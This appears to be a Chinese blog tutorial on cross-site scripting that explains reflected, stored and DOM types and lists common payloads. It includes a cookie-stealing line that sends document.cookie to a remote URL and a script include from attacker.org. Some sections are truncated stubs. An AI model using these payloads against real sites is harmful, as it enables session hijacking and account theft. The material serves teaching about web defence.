> 文章列表 > 【无标题】

【无标题】

【无标题】

xss简介
XSS攻击全称跨站脚本攻击(Cross Site Scripting),但为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。一般只要有用户输入的地方,就可能会出现XSS漏洞。
可能造成的危害
网站弹框(刷流量)
网站挂马
会话劫持
控制目标数据
Cookie被盗取
用户提权
账号被盗
强制发送电子邮件
尽量DDOS
蠕虫攻击等
xss分类
反射型XSS
存储型XSS
DOM型XSS
攻击原理
反射型xss攻击原理
反射型XSS又称非持久型XSS,攻击方式仅具有一次性。反射型XSS只是简单地把用户输入的数据“反射”给浏览器。也就是说,黑客往往需要诱使用户“点击”一个恶意链接,才能攻击成功。

存储型xss攻击原理
存储型XSS会把用户输入的数据“存储”在服务器端。这种XSS具有很强的稳定性。比较常见的一个场景就是,黑客写下一篇包含有恶意JavaScript代码的博客文章,文章发表后,所有访问该博客文章的用户,都会在他们的浏览器中执行这段恶意的JavaScript代码。每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie

DOM型xss攻击原理
基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI ,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。
漏洞利用
1.盗取cookie:
3.构造获取cookie并发送到远程主机:

<script>document.location='http://127.0.0.1/test/cookie.phpcookie='+document.cookie</script>

常见注入点
输入框
留言板
URL中可传参数的变量

常用Payload
Script标签

<script>alert(/1/)</script>
<script>prompt(1)</script> 
<script>confirm(1)</script>
<script src="http://attacker.org/malicious.js"></script>
<script src=data:text/javascript,alert(1)></script>
<script>setTimeout(alert(1),0)</script>

Img标签:

<img src=x onerror=alert(1)>
<img src=x onerror=prompt(1);>
<img src=javascript:alert('1')>

a标签:

<a href=”javascript:alert(1)”>点击触发</a>
<a href="http://www.hacker.com">点击触发</a>

Iframe标签:

<iframe src="javascript:alert(1)">
<iframe onload=alert(1)>

其他标签:

<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>

常用事件:
onclick: 点击触发 (
onerror: 当 src 加载不出来时触发 (
onload: 当 src 加载完毕触发(
onmouseover:鼠标指针移动到图片后触发(
onmousemove: 鼠标指针移到指定的元素后触发(
onfocus: 当 input 输入框获取焦点时触发()

常用属性:
src
action
href
data
content

javascript弹窗函数:
alert()
confirm()
prompt()

常用绕过方法
1.大小写绕过()

Xss漏洞的防范
不信任任何用户的输入,对每个用户的输入都做严格检查,过滤,在输出的时候,对某些特殊字符进行转义,替换等

穿搭知识